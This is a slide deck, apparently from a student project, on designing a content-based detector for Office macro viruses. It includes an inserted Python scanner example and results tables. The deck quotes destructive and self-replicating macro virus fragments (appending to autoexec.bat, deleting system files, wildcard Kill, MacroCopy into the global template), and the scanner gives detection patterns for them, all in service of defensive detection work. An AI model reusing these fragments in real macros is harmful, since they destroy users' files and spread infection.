
Design and Implementation of The FiltroMatic™

Presented By:

Lord Viper Scorpion

D4 C0rrupt0r

The Dark Stallion of Chaos

Master of Terror

Why Worry About Macro Viruses?

There are a lot of maladjusted individuals with no better way to deal with their frustration with society

Microsoft allows macros way too many privileges, and this is really easy to exploit

Macro viruses cause a lot of damage
– $12.1B in 1999, according to Computer Economics
– Melissa alone caused $80 million in damage

Why are Current Methods Ineffective and How can we Improve Them?

Commercial anti-virus programs only check for fingerprints of known viruses

We propose a generalized macro filter that looks for viruses based on the content of the code

How does one determine if code is “bad” or not?

VBA Background

What is VBA and how is it used?
– General purpose scripting language for Office applications
– Used to automate repetitive tasks, format documents…

Where does it derive its functionality?
– From Application object libraries
– From the Windows API, .DLLs on the host system

So what’s the problem?
– A VBA macro has the same privileges on the host as a native executable

Dealing with Microsoft’s Lack of Foresight

How can we compensate for the security vulnerabilities introduced by VBA?
– By scanning macros for code that is clearly malicious
– By alerting the user of possible misuse of code that could go either way
– By trying to identify malicious macros without flagging legitimate ones

Designing a Macro Filter

Background Research
– Learned VBA mechanisms
– Reviewed known malicious macros
– Compiled a list of VBA functions common to macro viruses
– Reviewed legitimate macros to determine where “gray” areas exist

Example of VBA Malcode

From the “Friends” macro virus:

    Open "C:\autoexec.bat" For Append As #1
    Print #1, "@echo off"
    Print #1, "c:\dos\fast.com"
    Close #1

Another Example of VBA Malcode

From the “Galicia Kalidade” macro virus (Spanish-localized WordBasic: FijarAtributos is SetAttr, EdiciónBuscarEncontrado is EditFindFound):

    If EdiciónBuscarEncontrado() <> 0 Then
        FijarAtributos "C:\IO.SYS", 0
        FijarAtributos "C:\MSDOS.SYS", 0
        Kill "C:\IO.SYS"
        Kill "C:\MSDOS.SYS"

Yet Another VBA Malcode Example

From the “Atom” macro virus (the date check reads Day(Now()) = 13 And Month(Now()) = 12; the transcript had a misplaced parenthesis):

    Sub MAIN
        On Error Goto KillError
        If Day(Now()) = 13 And Month(Now()) = 12 Then
            Kill "*.*"
        End If
    KillError:
    End Sub

Yes, You Guessed It … Another VBA Virus Example

From the “Retro” macro virus (one WordBasic statement per line):

    If Not Y Then
        F$ = WindowName$()
        S$ = F$ + ":Puritan"
        MacroCopy S$, "Global:Puritan"
        S$ = F$ + ":Rtr"
        MacroCopy S$, "Global:Retro"
        S$ = F$ + ":FSAB"
        MacroCopy S$, "Global:FileSaveAs"
        S$ = F$ + ":FSAB"
        MacroCopy S$, "Global:FSAB"
        S$ = F$ + ":AOB"
        MacroCopy S$, "Global:AOB"
    End If

Implementation of our Filter

We chose to implement it as a Java library that developers could integrate into their applications.

Implementation consists of MacroScanner, MalCodeItem, MalCodeList, Report, and ReportItem.

Tailored scanner to minimize false positives. What weaknesses does our method have?
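As an added example (not the FiltroMatic Java library, whose source is not on these slides), here is a small Python scanner built along the lines the slides describe: a list of items split into “clearly malicious” and “gray area” categories, a scanner that walks a macro line by line, and a report that counts warnings the way the results tables do. The names MacroScanner, MalCodeItem, MAL_CODE_LIST, Report and ReportItem are borrowed from the implementation slide; the patterns, the severities, the verdict rule and the three sample macros are assumptions constructed for illustration, the first sample being modelled on the Friends, Atom and Retro fragments shown above.

```python
import re
from dataclasses import dataclass, field

# Added example, not the FiltroMatic library: class names follow the slide, while the
# patterns, severities, verdict rule and sample macros are constructed assumptions.


@dataclass(frozen=True)
class MalCodeItem:
    name: str
    pattern: re.Pattern
    severity: str  # "malicious": flag outright; "gray": alert the user, could go either way
    note: str


def _rx(p):
    return re.compile(p, re.IGNORECASE)


# The MalCodeList, built from the mechanisms visible in the slide examples (appending to
# autoexec.bat, wildcard Kill, MacroCopy into the global template) plus gray-area calls.
MAL_CODE_LIST = [
    MalCodeItem("write-autoexec", _rx(r'\bOpen\s+"[^"]*autoexec\.bat"\s+For\s+(Append|Output)'), "malicious", "writes to the DOS startup file"),
    MalCodeItem("kill-wildcard", _rx(r'\bKill\s+"[^"]*\*[^"]*"'), "malicious", "wildcard file deletion"),
    MalCodeItem("macrocopy-global", _rx(r'\bMacroCopy\b.*"Global:'), "malicious", "copies a macro into the global template"),
    MalCodeItem("kill", _rx(r'\bKill\s+'), "gray", "deletes a file"),
    MalCodeItem("setattr", _rx(r'\bSetAttr\s+'), "gray", "changes file attributes"),
    MalCodeItem("file-write", _rx(r'\bOpen\s+.+\s+For\s+(Append|Output|Binary)'), "gray", "opens a file for writing"),
    MalCodeItem("error-suppression", _rx(r'\bOn\s+Error\s+(Resume\s+Next|Goto)'), "gray", "hides runtime errors"),
]


@dataclass
class ReportItem:
    line_no: int
    item: MalCodeItem
    source: str  # the offending line, shown to the user for review


@dataclass
class Report:
    items: list = field(default_factory=list)

    def count(self, severity):
        return sum(1 for r in self.items if r.item.severity == severity)

    def verdict(self):
        # Three-way outcome: flag clearly malicious code, alert on gray areas, pass the rest.
        if self.count("malicious"):
            return "malicious"
        return "suspicious" if self.count("gray") else "clean"


class MacroScanner:
    def __init__(self, mal_code_list=MAL_CODE_LIST):
        self.mal_code_list = mal_code_list

    def scan(self, macro_source):
        report = Report()
        for line_no, raw in enumerate(macro_source.splitlines(), start=1):
            line = raw.strip()
            if not line or line.startswith("'") or line.lower().startswith("rem "):
                continue  # comments never execute; skipping them avoids false positives
            hits = [m for m in self.mal_code_list if m.pattern.search(line)]
            if any(h.severity == "malicious" for h in hits):
                hits = [h for h in hits if h.severity == "malicious"]  # stronger finding subsumes the gray ones
            report.items.extend(ReportItem(line_no, h, line) for h in hits)
        return report


def scan_summary(macro_source):
    """Counts in the shape of the results tables on the slides."""
    r = MacroScanner().scan(macro_source)
    return {"verdict": r.verdict(), "malicious": r.count("malicious"), "gray": r.count("gray"), "total": len(r.items)}


# Constructed sample macros; the first is modelled on the Friends/Atom/Retro fragments above.
SAMPLE_MALICIOUS = """\
Sub AutoOpen()
    On Error GoTo KillError
    Open "C:\\autoexec.bat" For Append As #1
    Print #1, "@echo off"
    Close #1
    If Day(Now()) = 13 Then Kill "*.*"
    MacroCopy "Doc:AutoOpen", "Global:AutoOpen"
KillError:
End Sub
"""
SAMPLE_GRAY = """\
Sub SaveLog()
    Open "C:\\temp\\report.log" For Output As #2
    Close #2
    Kill "C:\\temp\\scratch.tmp"
End Sub
"""
SAMPLE_BENIGN = """\
Sub FormatHeadings()
    For Each p In ActiveDocument.Paragraphs
        If p.Style = "Heading 1" Then p.Range.Font.Bold = True
    Next p
End Sub
"""
```

scan_summary(SAMPLE_MALICIOUS) reports 4 warnings (3 malicious, 1 gray) and the verdict “malicious”; the logging macro gets 2 gray warnings and “suspicious”, so the user is alerted rather than blocked; the formatting macro gets 0 and “clean”. The setattr pattern also points at the weakness the slide asks about: the Galicia fragment uses the Spanish-localized name FijarAtributos, which an English-only literal pattern never matches, so a filter of this kind needs the localized command names as well, and it should work from a parsed token stream rather than raw text so that comments and string contents are told apart reliably.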

Sample of Scanning Results for Malicious Macros

Virus      Number of Warnings
Melissa    11
WordSavr   2
Vengine    2
Polyssa    12
Magnum     17
Hassle     27

Sample of Scanning Results for Legitimate Macros

Macro      Number of Warnings
Good-1     0
Good-2     0
Good-3     0
Good-4     0
Good-5     0
Good-6     0

Conclusions

Macro viruses tend to use the same mechanisms to spread and attack

Our filter takes advantage of these similarities to detect known and unknown macro viruses